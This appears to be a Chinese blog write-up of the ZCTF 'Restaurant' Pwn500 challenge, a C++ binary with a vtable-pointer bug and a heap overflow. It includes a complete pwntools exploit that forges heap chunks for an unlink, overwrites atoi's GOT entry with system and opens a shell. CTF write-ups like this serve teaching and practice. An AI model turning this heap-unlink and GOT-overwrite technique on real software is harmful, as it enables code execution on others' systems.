版权声明:本文为博主原创文章,未经博主允许不得转载。

 这道压轴的题也是名副其实,很有分量。这也是自己第二次做C++类型的PWN。含有两个漏洞,缺一不可,一个漏洞将指定位置覆盖为对象虚表的地址,另外一个漏洞用来堆溢出(DW-Shoot)。

第一个漏洞所在位置:

第二个漏洞所在位置:如果连续对一种食物编辑评论,第二次则可以8字节的溢出,覆盖下一个堆块的堆头。

由于堆块在分配时的对齐策略,堆块分配后可以使用的内存可能比申请的要大。这道题目中,主食/主菜/汤都有3个种类,只有同时能选中主食的第二种,主菜的第二种才能溢出,而这个选择是随机的,POC所以并不能每次都成功,我这个POC成功的概率为1/9,其实多试几次就能顺利拿到shell。我大概试了3-4次就拿到了shell。上图:

 from pwn import *

 import time

 #by wangaohui

 #context.log_level = 'debug'

 s= remote('127.0.0.1',10001)

 time.sleep(2)

 print 'pid of restaurant is :' + str(pwnlib.util.proc.pidof('restaurant')[0])

 raw_input('go!')

 s.recvuntil('Please enter your name: ')

 s.sendline('/bin/sh;')

 s.recvuntil('you are the luckey ')

 heap = int(s.recvuntil('th guest.\n')[:-10])

 print 'heapaddr is %x' %heap

 s.recvuntil('Are you from China? (y/n) ')

 s.sendline('n')

 s.recvuntil('please enter your country: ');

 vtp = 0x404710

 data = 'a'*10 + '\x00' + 'a'*5 + '\x1c\x47\x40\x00'

 s.sendline(data)

 s.recvuntil('How old are you: ')

 s.sendline('')

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Successfully order a staple food, enjoy it!')

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Successfully order an entree, enjoy it!')

 '''

 s.recvuntil('8. Finish your order.')

 s.sendline('3')

 s.recvuntil('Successfully order a staple food, enjoy it!')

 '''

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline('xxx')

 s.recvuntil('How does this dish taste: ')

 s.sendline('yyy')

 fakefd = heap + 0x20

 fakebk = heap + 0x28

 appcom = 'a'*40 + p64(0x80) + p64(0x90)

 tastecom = p64(0x81) + p64(fakefd) + p64(fakebk)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('want to cancel(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('the chef has already started to cook.')

 appcom = 'xxx'

 tastecom = p64(0x6060A0)#atoi's got

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('Your age: ')

 atoiaddr = int(s.recvuntil('\n')[:-1])

 print 'atoiaddr is:  %x' % atoiaddr

 systemaddr = atoiaddr - 0x36360 + 0x414F0

 print 'systemaddr is:  %x' % systemaddr

 appcom = 'xxx'

 tastecom = 'a'*8 + p64(systemaddr)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')

 s.sendline('')

 s.recvuntil('How does this dish look: ')

 s.sendline(appcom)

 s.recvuntil('How does this dish taste: ')

 s.sendline(tastecom)

 s.recvuntil('8. Finish your order.')

 s.sendline('')

 s.recvuntil('3.Just so so!')

 s.sendline('3.Just so so!')

 s.recvuntil('Thank you for your comment,bye!')

 s.interactive()

ZCTF-Restaurant-Pwn500的更多相关文章

  1. CodeForces - 261B Maxim and Restaurant

    http://codeforces.com/problemset/problem/261/B 题目大意:给定n个数a1-an(n<=50,ai<=50),随机打乱后,记Si=a1+a2+a ...

  2. Flo's Restaurant[HDU1103]

    Flo's Restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Others) ...

  3. Codeforces Testing Round #12 B. Restaurant 贪心

    B. Restaurant Time Limit: 20 Sec Memory Limit: 256 MB 题目连接 http://codeforces.com/contest/597/problem ...

  4. HDU-2368 Alfredo's Pizza Restaurant

    http://acm.hdu.edu.cn/status.php Alfredo's Pizza Restaurant Time Limit: 1000/1000 MS (Java/Others)   ...

  5. hdoj 4883 TIANKENG’s restaurant【贪心区间覆盖】

    TIANKENG’s restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 131072/65536 K (Java/O ...

  6. hdu2368Alfredo's Pizza Restaurant

    Problem Description Traditionally after the Local Contest, judges and contestants go to their favour ...

  7. HDOJ 4883 TIANKENG’s restaurant

    称号: TIANKENG's restaurant Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 131072/65536 K (Ja ...

  8. Restaurant

    Restaurant Time Limit:4000MS     Memory Limit:262144KB     64bit IO Format:%I64d & %I64u Submit  ...

  9. 九校联考_24OI——餐馆restaurant

    凉心模拟D1T1--最简单的一道题 TAT 餐馆(restaurant) 题目背景 铜企鹅是企鹅餐馆的老板,他正在计划如何使得自己本年度收益增加. 题目描述 共有n 种食材,一份食材i 需要花ti 小 ...

  10. Codeforces828 A. Restaurant Tables

    A. Restaurant Tables time limit per test 1 second memory limit per test 256 megabytes input standard ...

随机推荐

  1. .net 文件下载方法

    public void DownLoadMethod(string FilePath)        {            string hzm = Path.GetExtension(FileP ...

  2. 重置MySQL的root用户密码(Window)

    1.首先要停止Mysql服务.打开CMD,键入命令 net stop mysql 默认的mysql服务名就是mysql,如果你修改过服务名,请自行对照修改命令. 2.在CMD中进入mysql的bin目 ...

  3. Delphi 做ActiveX的详细过程

    1.新建 如下图 点击OK 依然点击OK 出现了如上图的节面,就像窗体一样. 然后 你就想干什么干什么. 这个做好之后, 这个是我设计的窗体. 然后 就添加 外部可以调用的接口了. 如果你不想让外部调 ...

  4. C#操作MYSQL遇到0000-00-00日期报错的原因

    今天在做一个C#连接MYSQL数据库,并读取数据库的内容,遇到了0000-00-00日期转换报错:unable to convert MySQL date/time value to System.D ...

  5. basename usage in linux

    作用:去掉文件的目录和后缀 1.去掉文件路径 jenkins@work:~/ci/script$ basename /backup/jenkins/ci/script/Release.sh.bak R ...

  6. phpcms v9版本二次开发四步曲

    今晚看了一下PHPCMS V9版本,做一个实例抛砖引玉,其实很简单,以下是二次开发的一个实例以旅游模块为例1.   在phpcms\modules目录下建立一个文件夹tour2.  在phpcms\m ...

  7. [转]100个经典C语言程序(益智类问题)

    目录: 1.绘制余弦曲线 2.绘制余弦曲线和直线 3.绘制圆 4.歌星大奖赛 5.求最大数 6.高次方数的尾数 8.借书方案知多少 9.杨辉三角形 10.数制转换 11.打鱼还是晒网 12.抓交通肇事 ...

  8. 数据库 数据库SQL语句五

    集合运算 union 并集(两个集合如果有重复部分,那么只显示一次重复部分) union all 并集(两个集合如果有重复部分,那么重复部分显示两次) intersect 交集 minus 差集 -- ...

  9. IOS面试攻略

    IOS面试攻略(1.0) 2013-10-13 20:58:09|  分类: IOS面试 |  标签:ios知识点总汇  ios面试  |举报|字号 订阅     来自:伊甸网 @ 看到这个关键字,我 ...

  10. 使用Reaver加PIN码秒破WPA-PSK密码

    之前掌握到的破解WPA-PSK密码仅限于使用aircreack工具包获取handshake后挂字典爆破方式,而能否破解出wpa密码完全依赖于字典强度了.除了该方式外还有一个更有效的办法,就是使用路由P ...